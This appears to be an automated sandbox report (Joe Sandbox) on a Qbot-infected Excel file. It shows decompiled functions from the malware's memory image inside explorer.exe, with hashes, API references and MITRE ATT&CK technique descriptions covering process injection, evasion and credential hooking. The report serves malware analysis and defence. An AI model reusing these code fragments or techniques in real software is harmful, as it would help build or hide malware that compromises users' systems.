API String ID: 384173800-0
Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction ID: 646b41fc526916c853fab26bda9d5e10092a64f59f2f819cd785ba041931e28c
Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction Fuzzy Hash: D5A17AB5A00209EFCF54CF98D885AADBBF0FF48314F148559E825AB351D734A981DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00081C51, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00081C51(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1e4
				_t13 = E0008A501(_t41, 0);
				while(_t13 < 0) {
					E000897ED( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0x14df8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1e4
						__eflags = 0;
						_t13 = E0008A501(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0x14dfdb8
				_v28 = _t20;
				_t22 = E0008A6EB(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E000897ED(0x9e6e0);
					_t64 = E00081A01( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089ED1(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0x14df8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1e4
				 *0x9e6d0 = 0;
				E0008A51D(_t48);
				E000885FB( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x00081c51
0x00081c5e
0x00081c60
0x00081c67
0x00081ccd
0x00081c74
0x00081c79
0x00081c7f
0x00081c84
0x00081c8a
0x00081c8c
0x00081c90
0x00081cfe
0x00081d00
0x00081d82
0x00081d88
0x00081d88
0x00081c92
0x00081c9a
0x00081c9a
0x00081ca6
0x00081cac
0x00081cae
0x00000000
0x00000000
0x00081cb0
0x00081cba
0x00081cc0
0x00081cc6
0x00081cc8
0x00000000
0x00081cc8
0x00081c94
0x00081c98
0x00000000
0x00000000
0x00000000
0x00081c98
0x00081cd7
0x00081cd8
0x00081cd9
0x00081cda
0x00081cdb
0x00081ce0
0x00081cea
0x00081cef
0x00081cf7
0x00081d12
0x00081d15
0x00081d1f
0x00081d2a
0x00081d3d
0x00081d3f
0x00081d41
0x00081d43
0x00081d44
0x00081d4c
0x00081d4d
0x00081d53
0x00081cf9
0x00081cf9
0x00081cf9
0x00081d54
0x00081d5f
0x00081d62
0x00081d68
0x00081d6e
0x00081d79
0x00081d80
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2496e523a1bcad309890bdadb9e8a4e23acb58a755257578e7477a6aebcc166
Instruction ID: 32fa2d0315736cd9dd457b92398e39eaf5c183d7f1ce8164e2c4fef327052670
Opcode Fuzzy Hash: b2496e523a1bcad309890bdadb9e8a4e23acb58a755257578e7477a6aebcc166
Instruction Fuzzy Hash: 0531C132604244AFF354FF68EC859AA77A9FF94394B040A2BF581C72E2DE349C45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00081B16, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00081B16(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1e0
				_t12 = E0008A501(_t38, 0);
				while(_t12 < 0) {
					E000897ED( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0x14df8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0x14df8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1e0
								__eflags = 0;
								_t12 = E0008A501(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E000897ED(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0x14dfdb8
				_v28 = _t24;
				_t61 = E00081A01( &_v28, E00081310, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089ED1(_t48);
				}
				if(_v24 != 0) {
					E00086871( &_v24);
				}
				_t26 =  *0x9e684; // 0x14df8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1e0
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A51D(_t46);
				_t15 = _t61;
				goto L12;
			}

0x00081b16
0x00081b1c
0x00081b2a
0x00081b98
0x00081b37
0x00081b3c
0x00081b42
0x00081b47
0x00081b4d
0x00081b4f
0x00081b53
0x00081c4d
0x00081c4d
0x00081b59
0x00081b59
0x00081b65
0x00081b65
0x00081b71
0x00081b77
0x00081b79
0x00000000
0x00081b7b
0x00081b7b
0x00081b85
0x00081b8b
0x00081b91
0x00081b93
0x00000000
0x00081b93
0x00081b5b
0x00081b5b
0x00081b5f
0x00000000
0x00000000
0x00000000
0x00000000
0x00081b5f
0x00081b59
0x00081c46
0x00081c4c
0x00081c4c
0x00081ba1
0x00081bb5
0x00081bb8
0x00081bc2
0x00081bce
0x00081bd8
0x00081bd9
0x00081bda
0x00081bdb
0x00081be0
0x00081be9
0x00081bed
0x00081bef
0x00081bf0
0x00081bf8
0x00081bf9
0x00081bff
0x00081c04
0x00081c0a
0x00081c0a
0x00081c0f
0x00081c1a
0x00081c1d
0x00081c25
0x00081c31
0x00081c34
0x00081c3a
0x00081c3f
0x00081c44
0x00000000

APIs

GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BB5
GetCurrentThread.KERNEL32(00000000), ref: 00081BB8
GetCurrentProcess.KERNEL32(00000000), ref: 00081BBF
DuplicateHandle.KERNEL32 ref: 00081BC2

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: dc00a6f234308782c87ce612f424c0ccfefd8b5632b514a8c79e256036496adc
Instruction ID: f96180bd9b8aa37851658eef74f7edd86bca5450b5cdcd4767c72984123f9977
Opcode Fuzzy Hash: dc00a6f234308782c87ce612f424c0ccfefd8b5632b514a8c79e256036496adc
Instruction Fuzzy Hash: 8731A135608680DFF704FFA4EC859AA77A8FF64391B04086EF641C72A2DA389C05CB52

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Rebate-690835286-10052021.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Qbot

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Persistence and Installation Behavior:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Rebate-690835286-10052021.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: UserForm2, Stream Size: -1

General

VBA Code

VBA File Name: Module1, Stream Size: 2154

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre